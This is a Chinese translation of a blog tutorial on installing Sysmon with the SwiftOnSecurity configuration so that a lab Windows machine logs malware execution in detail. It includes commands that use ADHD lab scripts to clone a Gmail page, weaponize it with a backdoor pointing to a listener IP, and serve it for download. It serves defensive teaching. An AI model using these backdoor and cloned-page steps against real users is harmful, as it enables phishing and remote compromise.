开始使用Sysmon

作者：John Strand //

在这篇博客中，我将逐步介绍如何设置Sysmon，以便轻松获得比Windows标准（而且相当糟糕）日志更好的日志记录效果。基本上，尝试从标准Windows日志中获取信息很像对着窗帘打网球。当然，你可以做出正确的动作，也可以非常努力，但无论如何，效果都会很差。

在本博客中，我们将使用ADHD，你可以从这里获取： https://www.activecountermeasures.com/free-tools/adhd/

我希望在你操作时，我已经将其更新到我在Black Hat 2019上使用的版本。

首先，让我们启动ADHD Linux系统并设置我们的恶意软件和C2监听器：

在你的Linux系统上，请运行以下命令：

1

$ifconfig

请记下你的以太网适配器的IP地址。

请注意，我的适配器名为ens33，IP地址为192.168.123.128。你的IP地址和适配器名称可能不同。

请在下面记下你的ADHD Linux系统的IP地址：

现在，运行以下命令来启动一个简单的后门和后门监听器：

1
2
3
4
5

$ sudo su -
# cd /opt/java-web-attack/
# ./clone.sh https://gmail.com
# ./weaponize.py index.html 192.168.123.128 <<<--- 你的IP会不同！！！！
# ./serve.sh

接下来，回到你的Windows系统，以管理员身份登录。

我们现在需要以管理员身份打开cmd.exe终端。记住，按下Windows键，输入cmd.exe，右键单击它，然后选择“以管理员身份运行”。

请花点时间从这里下载Sysmon： https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

然后，将其解压到C:\Tools目录。

并且，将Swift on Security的sysmon配置下载到Tools目录。

你可以在这里找到它： https://github.com/SwiftOnSecurity/sysmon-config

我建议将其下载为zip文件并解压到Tools目录。

然后，输入以下内容：

1
2

C:\Windows\system32>cd \Tools
C:\Tools>Sysmon64.exe -accepteula -i sysmonconfig-export.xml

系统监视器 v10.2 - 系统活动监视器 版权所有 (C) 2014-2019 Mark Russinovich and Thomas Garnier Sysinternals - www.sysinternals.com

使用架构版本4.00加载配置文件 Sysmon架构版本：4.21 配置文件已验证。 Sysmon64已安装。 SysmonDrv已安装。 启动SysmonDrv。 SysmonDrv已启动。 启动Sysmon64。 Sysmon64已启动。

现在，让我们下载并执行恶意软件。

接下来，浏览到你的Linux系统，下载恶意软件并尝试再次运行它。

现在，我们需要查看此恶意软件的Sysmon事件： 你将选择事件查看器 > 应用程序和服务日志 > Windows > Sysmon > 操作

从顶部开始，向下查看日志。你应该能看到你的恶意软件正在执行。

如上所示，日志中的详细程度非常棒。它提供了进程、IP地址、运行者以及哈希值。你一直想要的一切，全部免费……来自微软。

想要通过Active Directory中的组策略实现这一点吗？想要将日志发送到ELK吗？ 查看以下视频：

想要提升技能并直接从John本人那里学习更多吗？你可以查看他的以下课程！ SOC核心技能 主动防御与网络欺骗 与BHIS和MITRE ATT&CK一起开始安全之旅 渗透测试入门

提供实时/虚拟和点播形式